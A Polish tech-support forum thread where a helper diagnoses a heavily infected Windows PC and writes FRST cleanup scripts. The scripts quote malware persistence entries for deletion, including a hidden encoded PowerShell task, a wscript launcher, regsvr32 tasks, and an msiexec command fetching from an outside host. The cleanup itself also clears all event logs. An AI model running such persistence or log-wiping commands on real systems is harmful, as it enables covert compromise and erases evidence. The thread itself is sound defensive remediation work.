Skocz do zawartości
WAŻNE - Użytkownicy uprawnieni do pomocy
WAŻNE - Zakładanie tematu: obowiązkowe logi
Nadchodzące zmiany w logowaniu

Wirus

Zabuziaq

Przez Zabuziaq
w Dział pomocy doraźnej

Rekomendowane odpowiedzi

Zabuziaq

Zabuziaq

Opublikowano
Opublikowano (edytowane)

Witam, od tygodnia kiedy uruchamiam przeglądarkę mój komputer strasznie się zacina, muli, a antywirus nic nie znajduję.

Wczoraj ściągnąłem program AdwCleaner, gdyż wyskakują mi reklamy pomimo tego, że mam Adblockery. Podczas próby instalacji wyskakuje błąd systemu plików 65535 i jakby blokował mi możliwość zainstalowania AdwCleaner.

 

Wydaję mi się, że jest jakiś cichy zabójca, który od tygodnia zjada mój komputer. Bardzo proszę o pomoc...

Shortcut.txt

FRST.txt

Addition.txt

Edytowane przez Miszel03
Poprawiam pisownie. //Miszel03
Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.
Miszel03

Miszel03

Opublikowano
Opublikowano

Kolosalny bałagan.
Multum instalacji adware i infekcji (w tym infekcja bezplikowa wykonywana przez PowerShell). Niestety, ale zainfekowane są też i DNS (ale tylko spod Windows) - adresy widziane w raportach są izraelski (KLIK / KLIK) i często zgłaszane tu jako infekcyjne.
Ponad to fałszywe przeglądarki / profile / certyfikaty (te ostatnie blokują Ci instalacje programów czyszczących m.in AdwCleaner'a).

Nie będę się rozpisywał, bo mógłbym pisać do rano co tu widzę i co wymaga korekty. Proszę wykonywać moje zalecenia jeden do jednego, bez pośpiechu - tylko w taki sposób doprowadzimy to szybko do porządku. 
 
Podobny przypadek: KLIK
 
1. Deinstalacje:

  • Za pomocą Program Install and Uninstall Troubleshooter odinstaluj agresywne adware / PUP: Online Application.
  • Przez Panel Sterowania odinstaluj adware / PUP: WarThunder, FastDataX 1.20 i jeśli nie znasz to też Holiday Express.

2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:
 

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-478647955-3472351390-1182581596-1000\...\ChromeHTML: -> C:\Program Files (x86)\Cupduck\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Cupduck
C:\Users\administratorka\AppData\Local\Cupduck
C:\Users\administratorka\AppData\Roaming\Cupduck
C:\Program Files (x86)\Firefox
C:\Users\administratorka\AppData\Local\Firefox
C:\Users\administratorka\AppData\Roaming\Firefox
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [116376 2017-05-23] () DeleteKey: HKCU\Software\Cupduck
DeleteKey: HKLM\SOFTWARE\WOW6432Node\Cupduck
DeleteKey: HKCU\Software\Firefox
DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox
CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll => Brak pliku
ContextMenuHandlers1_S-1-5-21-478647955-3472351390-1182581596-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku
ContextMenuHandlers4_S-1-5-21-478647955-3472351390-1182581596-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku
ContextMenuHandlers5_S-1-5-21-478647955-3472351390-1182581596-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku
Task: {32396D88-557C-4C4E-9B26-025EDAA48549} - \PowerWord-SCT-JT -> Brak pliku Task: {78DD82B5-91E5-44CD-92AD-5D158744913E} - \Windows-WoShiBeiYongDe -> Brak pliku Task: {58483EE7-A7F3-41C5-AD0E-22B2E1469AC7} - System32\Tasks\82F37914-A36A-6A79-9CCE-BAC5980BBB44 => C:\Windows\SysWOW64\regsvr32.exe /n /s /i:"/1190cf1e9d8bccd9 /q" "C:\Users\ADMINI~1\AppData\Local\78EB64~1\{65C50~1."
Task: {CD5D4BB2-AF26-4D25-9B2E-D36BB41D916F} - System32\Tasks\{F55353F7-257A-4BE2-CE80-ED3F1C1ADC3E} => C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\Users\ADMINI~1\AppData\Local\78EB64~1\65c50efb.dll" Task: {6F6305AB-354E-4BB0-8D8D-0AE54BB8D1F0} - System32\Tasks\{838FBDD6-4401-4BFC-8DBC-80C9694AD4AE} => C:\Windows\system32\pcalua.exe -a C:\Users\ADMINI~1\AppData\Local\Temp\lui1CF5.tmp\setup.exe -d C:\Users\ADMINI~1\AppData\Local\Temp\Rar$EXa0.977 Task: {82F5D2D1-674E-40C6-972E-CCADEED6C20A} - System32\Tasks\English To Chaser => C:\Windows\system32\rundll32.exe "C:\Program Files\English To Chaser\English To Chaser.dll",LOBbcwq Task: {C7E8A21F-1FAA-410A-BC72-8DFF12E1A01B} - System32\Tasks\Chromium lotas => "wscript.exe" "C:\ProgramData\{1C91D9F2-96D3-5334-1015-CD768A5746B8}\dodi.txt" "68747470733a2f2f6b6174756e61712e636f6d" "433a5c50726f6772616d446174615c7b31433931443946322d393644332d353333342d313031352d4344373638413537343642387d5c6d6973617361" "433a5c50726f6772616d446174615c7b31433931443946322d393644332d353333342d (dane wartości zawierają 84 znaków więcej). Task: {E9BDE757-84E7-4207-9089-B095B2313ECD} - System32\Tasks\{09097A47-090F-7A0F-0B11-0E090B7D1108} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAOwA7ACAAIAA7ADsAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIAZQBuAGMA (dane wartości zawierają 9568 znaków więcej). C:\Users\ADMINI~1\AppData\Local\78EB64~1
C:\Program Files\English To Chaser
HKLM\...\RunOnce: [KOMPUTER01] => C:\Windows\TEMP\gC560.tmp.exe [209408 2018-01-24] () HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia HKU\S-1-5-21-478647955-3472351390-1182581596-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj1LNTU4MdhWFdRYFTM8FjF2MYZQNjQLOYI5MUFyFkM8RF== /q HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE -> 
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger] 
GroupPolicy: Ograniczenia Tcpip\Parameters: [NameServer] 82.163.143.176 82.163.142.178
Tcpip\..\Interfaces\{8EF21497-7361-4F1C-A09C-A9A671FA6743}: [NameServer] 82.163.143.176 82.163.142.178
Toolbar: HKU\S-1-5-21-478647955-3472351390-1182581596-1000 -> Brak nazwy - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  Brak pliku
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms}
HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB
HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms}
SearchScopes: HKU\S-1-5-21-478647955-3472351390-1182581596-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms}
CHR HomePage: Default -> hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB
FF Plugin: @microsoft.com/GENUINE -> disabled [brak pliku]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [brak pliku]
R2 WinCacheSrv; C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp [205826 ] () [brak podpisu cyfrowego] C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp
S2 CornerSunshineSvc; "C:\Program Files (x86)\Corner Sunshine\CornerSunshineSvc.exe" {8A712DBD-E08B-4D5C-839D-1B9C185FE769} [X]
2018-01-24 11:05 - 2016-10-21 14:12 - 000000000 _____ C:\Users\Public\Documents\report.dat
2018-01-24 11:03 - 2016-09-29 09:51 - 000001195 _____ C:\Users\Public\Documents\temp.dat
2018-01-19 13:55 - 2016-10-21 14:12 - 000000000 ____D C:\ProgramData\fjcfi
2018-01-19 13:55 - 2016-10-21 13:44 - 000000000 ____D C:\ProgramData\chuvc
2017-12-27 19:59 - 2017-12-29 20:59 - 000000068 _____ () C:\Users\administratorka\AppData\Local\YdozKPUZep
C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Picasa 3.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverDoc\DriverDoc.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverDoc\Register DriverDoc.lnk
C:\Users\administratorka\Desktop\Google Chrome.lnk
C:\Users\administratorka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk
C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mozilla Firefox.lnk
C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk
C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox (2).lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk
C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk
ShortcutWithArgument: C:\Users\administratorka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\theHunter\theHunter.lnk -> D:\theHunter\launcher\launcher.exe (Expansive Worlds) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla Firefox (Safe Mode).lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB
CMD: dir /a "C:\Program Files"
CMD: dir /a "C:\Program Files (x86)"
CMD: dir /a "C:\Program Files\Common Files\System"
CMD: dir /a "C:\Program Files (x86)\Common Files\System"
CMD: dir /a C:\ProgramData
CMD: dir /a C:\Users\administratorka\AppData\Local
CMD: dir /a C:\Users\administratorka\AppData\LocalLow
CMD: dir /a C:\Users\administratorka\AppData\Roaming
CMD: netsh advfirewall reset
CMD: ipconfig /flushdns
Hosts:
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:

 
Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 
Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.
 
3. Po tej akcji zniknęły skróty przeglądarek - odtwórz je. 
 
4. Przeglądarka Mozilla FireFox padła ofiarą adware podstawiającego fałszywe profile - wymagana jest ich kompleksowa wymiana.
  • Kliknij klawisz 2niww3b.png+ R > wklej komendę "C:\Program files (x86)\Mozilla Firefox\firefox.exe" -p > załóż nowy profil, wszystkie poprzednie skasuj. 

5. Wyczyść przeglądarkę Google Chrome:

  • Zresetuj synchronizację (o ile włączona): KLIK.
  • Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia.
  • Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
  • Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google.
  • Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikacje infekcji. 

6. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).
 

cupduck;firefox

 
Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 
 
7. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.
Odnośnik do komentarza
Miszel03

Miszel03

Opublikowano
Opublikowano

Przez Panel Sterowania odinstaluj adware / PUP: WarThunderFastDataX 1.20 i jeśli nie znasz to też Holiday Express.

 

Hmm...nie potrafię zweryfikować tego Holiday Express, ale to raczej nie było adware i całkiem długo siedziało w systemie.

Widzę, że odinstalowałeś, a to znaczy, że też nie znałeś tego oprogramowania. Posprzątam po nim resztki, bo są widoczne. 

 

 

Wszystko pomyślnie wykonane, infekcje usunięte. Jesteśmy bardzo blisko końca - wdrążymy poprawki / doczyszczenia i skan antywirusowy. 

 

1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:

 

CloseProcesses:
CreateRestorePoint:
C:\Program Files (x86)\BiaoJi
C:\ProgramData\2e89a3
C:\ProgramData\3fed80ce-11f1-0
C:\ProgramData\3fed80ce-6ab7-1
C:\ProgramData\f595a9da-09e7-0
C:\ProgramData\f595a9da-27b7-1
C:\ProgramData\f595a9da-4f15-0
C:\ProgramData\f595a9da-5873-0
C:\ProgramData\f595a9da-6717-1
C:\ProgramData\f595a9da-7567-1
C:\ProgramData\595a9da-7627-1
C:\ProgramData\f595a9da-77e3-0
C:\ProgramData\f595a9da-7951-0
C:\ProgramData\{2b155d02-712c-1}
C:\ProgramData\{69ee4733-212c-0}
C:\ProgramData\{1C91D9F2-96D3-5334-1015-CD768A5746B8}
DeleteKey: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\92a8fc28_0
DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\ftp\DefaultIcon|C:\Program Files (x86)\Cupduck\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\ftp\shell\open\command|C:\Program Files (x86)\Cupduck\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\http\DefaultIcon|C:\Program Files (x86)\Cupduck\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\http\shell\open\command|C:\Program Files (x86)\Cupduck\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\https\DefaultIcon|C:\Program Files (x86)\Cupduck\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\https\shell\open\command|C:\Program Files (x86)\Cupduck\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache|C:\Program Files (x86)\Cupduck\Application\chrome.exe
DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\DefaultIcon|C:\Program Files (x86)\Firefox\Firefox.exe
DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\InstallInfo|HideIconsCommand
DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\InstallInfo|ShowIconsCommand
DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\InstallInfo|ReinstallCommand
DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command|C:\Program Files (x86)\Firefox\Firefox.exe
DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\properties\command|C:\Program Files (x86)\Firefox\Firefox.exe
DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\safemode\command|C:\Program Files (x86)\Firefox\Firefox.exe
